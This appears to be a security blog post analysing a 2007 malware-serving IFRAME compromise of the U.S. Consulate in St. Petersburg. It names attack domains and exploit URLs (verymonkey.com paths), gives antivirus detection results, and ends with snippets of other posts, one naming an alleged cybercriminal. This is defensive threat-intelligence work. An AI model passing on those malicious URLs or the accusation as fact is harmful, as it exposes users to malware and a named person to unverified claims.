If that's not a pattern and good timing, it's a malicious anomaly. On the 31 of August, 2007, Bank of India was serving malware courtesy of the Russian Business Network. This week, evidence that the U.S Consulate in St. Petersburg, Russia was serving malware to its visitors proved to be true. The web site is now clean, but assessing the IFRAME-ed URLs used in the attack is possible as they're still reachable. It's still unknown for long the IFRAMEs remain embedded at the Consulate's web site, as well as when were they cleaned, but the attack was still active on the 2nd of September, 2007, just two days after Bank of India's malware attack. It's also worth mentioning that compared to the most recent malware embedded attacks which had the IFRAMEs directly embedded within, in this one the IFRAME itself is obfuscated but the live exploit URL isn't.
Tipped by a third-party, Sophos managed to locate the exact URL by deobfuscating the rather simple URL obfuscation, and Fraser Howard posted some interesting details at their blog :
"The purpose of the attacks is to infect victims with Trojans from the two attack sites. As discussed in a recent paper, the increased use of automation to continually re-encrypt/pack/obfuscate the Trojans highlights the need for good generic detection technology. A system to continuously monitor these files in order to maintain detection is essential. So, to answer the question of whether the U.S. Consulate General site was specifically targeted in this attack - my answer is no, probably not. The prevalence of other much smaller sites compromised in exactly the same way (in just seven days worth of data) suggests that the hackers just happened to have caught a big fish as they trawled for vulnerable servers. It just goes to show that security is important on all machines hosting both small and large websites."
We could greatly expand those as a matter of fact. The IFRAME used leads us to verymonkey.com/goof/index.php (188.8.131.52) and verymonkey.com/test/index.php which is exploiting a modified MDAC, and aims to execute the following binary Virus.Win32.Zapchast.DA :
Detection rate : Result: 6/32 (18.75%)
AntiVir 2007.09.14 DR/Delphi.Gen
AVG 2007.09.14 Obfustat.NPJ
eSafe 2007.09.13 Suspicious Trojan/Worm
Ikarus 2007.09.14 Virus.Win32.Zapchast.DA
VirusBuster 2007.09.13 Trojan.Agent.JVF
Webwasher-Gateway 2007.09.14 Trojan.Delphi.Gen
File size: 28672 bytes
Is this obfuscated IFRAME-ing a fad or a trend? I think it's a trend since IFRAME-ing to a secondary domain taking advantage of popular web malware exploitation techniques is already rated as suspicious by security vendors, and Google themselves warning you that "this site may harm your computer", and so they ought to win time. Moreover, such obfuscations are making it harder to assess how many sites and which ones exactly were victims of the attack in an OSINT manner. It gets even more interesting, the IP hosting verymonkey.com was historically used to host banksoffscotland.co.uk scam web site in March this year. In case you wonder, it's not the RBN that's behind this malware embedded attack, but let's say it's a subsidiary of the RBN.
Popular posts from this blog
I've recently came across to a news article detailing the recently leaked Bulgaria NAP records database and I decided to take a closer look. What does this leak basically constitute? Basically the attacker managed to compromise the security of the Web Site basically leading to a successful extraction of a decent-portion of data which could basically constitute a leak. NOTE: The data in this analysis has been obtained using public sources. In this post I'll profile a novice Bulgaria-based cybercriminal that basically managed to obtain access to the database and shared it within several cybercrime-friendly forum communities making it publicly accessible including an in-depth overview of TAD Group which is basically a Bulgaria-based penetration testing company. Real Name: Daniel Ganchev - Email: email@example.com Sample URL of the cybercriminal involved in the campaign: hxxp://instakilla.com/ - Email: firstname.lastname@example.org; email@example.com Instagram Account
New Report - "A Qualitative and Technical Collection OSINT-Enriched Analysis of the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital Security Team" - Grab a Copy Today!
Dear blog readers, It's a pleasure and an honor to let you know of a recently released commercially available report on Iran's Hacking Scene entitled - "A Qualitative and Technical Collection OSINT-Enriched Analysis of the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital Security Team" which is priced at $500 for unlimited distribution copies within your Team and Organization and can obtained from here . An excerpt: " In a cybercrime ecosystem dominated by fraudulent releases and nation-state actors including possible high-profile “sock-puppets” and cyber proxies type of rogue and potentially superficially engineered cyber warfare tensions it should be clearly noted that a modern OSINT and virtual HUMINT actionable threat intelligence analysis of major and prominent cyber actors should take place for the purpose of setting up the foundations for a successful cyber actor monitoring including possible offensive and couter-offensive t
You know you're popular when "they" say "hi". It's 2009 and I've received a surprising personal email courtesy of guess who - The Russian Business Network showing off the actual ownership of the hxxp://rbnnetwork.com domain and basically saying "hi". It's worth pointing out that throughout 2008-2013 I've extensively profiled the activities including the customer activities of some of the most prolific customers and members of the infamous Russian Business Network also known as the RBN in the context of blackhat SEO iFrame and input validation abuse across major Web properties including malvertising and various other malware-serving and client-side exploits serving campaigns including money mule recruitment and phishing campaigns the ubiquitous at the time fake security software also known as scareware in a variety of post series. Related post - Dissecting a Sample Russian Business Network (RBN) Contract/Agreement Throu